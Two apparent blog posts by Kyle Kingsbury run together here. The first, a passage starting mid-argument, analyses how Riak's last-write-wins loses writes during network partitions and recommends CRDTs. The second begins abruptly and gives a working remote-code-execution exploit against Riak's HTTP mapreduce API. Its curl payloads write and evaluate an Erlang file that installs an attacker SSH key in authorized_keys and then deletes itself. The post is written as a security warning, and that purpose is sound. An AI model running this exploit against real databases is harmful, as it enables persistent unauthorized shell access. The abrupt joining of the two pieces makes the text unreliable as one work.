Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock we write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to consider writes to those fallback copies of vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, one of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, and number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(LWW(a)) = LWW(a). It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.

Or you could use OR-sets. It’s 130 lines of ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \ http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF Riak is like the Beatles: listening has side effects. EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"] ], "query": [ {"map": { "language": "javascript", "source": " function(v) { // "/tmp/evil.erl" return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "write_file", "arg": " SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n SSH = SSHDir ++ \"authorized_keys\".\n filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n file:change_mode(SSHDir, 8#700).\n file:change_mode(SSH, 8#600).\n file:delete(\"/tmp/evil.erl\"). " }} ] } EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"]], "query": [ {"map": { "language": "javascript", "source": " function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "path_eval", "arg": "/tmp/evil.erl", }} ] }

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

Copyright © 2015 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.